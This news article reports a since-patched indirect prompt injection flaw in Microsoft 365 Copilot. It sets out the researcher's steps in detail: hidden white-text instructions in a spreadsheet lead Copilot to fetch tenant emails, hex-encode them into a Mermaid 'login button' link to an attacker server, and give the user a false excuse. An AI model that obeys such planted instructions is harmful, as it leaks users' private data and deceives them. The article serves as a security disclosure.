Microsoft has patched an indirect prompt injection flaw in Microsoft 365 Copilot that could have allowed attackers to steal sensitive data using clickable Mermaid diagrams.
According to findings published by security researcher Adam Logue, the exploit could be triggered through specially crafted Office documents containing hidden instructions. When processed by Copilot, these prompts caused the assistant to fetch recent enterprise emails, convert them into a hex-encoded string, and embed that data into a clickable diagram created with the diagramming tool Mermaid.
When a user clicks what looks like a legitimate “login” button in the diagram, the encoded data would to sent to an attacker-controlled server, Logue noted in a blog post.
Microsoft patched the flaw by removing the ability for interactive hyperlinks in Mermaid diagrams within Copilot chats. “This effectively mitigated the data exfiltration risk,” Logue confirmed.
Diagram trick for data leak
Logue laid out a multi-stage attack chain starting with a seemingly benign Office document (for example, an Excel sheet) containing visible content alongside hidden white-text instructions on a second sheet. These hidden prompts redirect Microsoft 365 Copilot away from its intended summarization task and instead instruct it to call its internal tool “search-enterprise_emails” to retrieve recent tenant emails.
The retrieved content is then hex-coded, broken into 30-character chunks (to satisfy rendering constraints), and embedded into a diagram created via Mermaid. That diagram is styled to look like a “login button” and contains a hyperlink pointing to an attacker-controlled server.
Logue was able to demonstrate (in a proof of concept), creating financial sheets with crafted instructions in white text. A successful exploit led the user to the attacker-controlled login. “When I asked M365 Copilot to summarize the document, it no longer told me it was about financial information and instead, responded with an excuse that the document contained sensitive information and couldn’t be viewed without proper authorization or logging in first,” Logue said.
The bigger threat of indirect prompt injection
The incident underscores that the risk goes beyond simple “prompt injection,” where a user types malicious instructions directly into an AI. Here, the attacker hides instructions inside document content that gets passed into the assistant without the user’s awareness. Logue described how the hidden instructions use progressive task modification (e.g, “first summarise, then ignore that and do X”) layered across spreadsheet tabs.
Additionally, the disclosure exposes a new attack surface where the diagram-generation feature (Mermaid output) becomes the exfiltration channel. Logue explained that clicking the diagram opened a browser link that quietly sent the encoded email data to an attacker-controlled endpoint. The transfer happened through a standard web request, making it indistinguishable from a legitimate click-through in many environments.
“One of the interesting things about mermaid diagrams is that they also include support for CSS,” Logue noted. “This opens up some interesting attack vectors for data exfiltration, as M365 Copilot can generate a mermaid diagram on the fly and can include data retrieved from other tools in the diagram.”
Recent disclosures highlight a surge in indirect prompt injection attacks, where hidden macros in documents or embedded comments in pull requests hijack AI-driven workflows and extract data without obvious user action. These trends underscore that tools like diagram generators or visual outputs can soon become stealthy channels for exfiltration.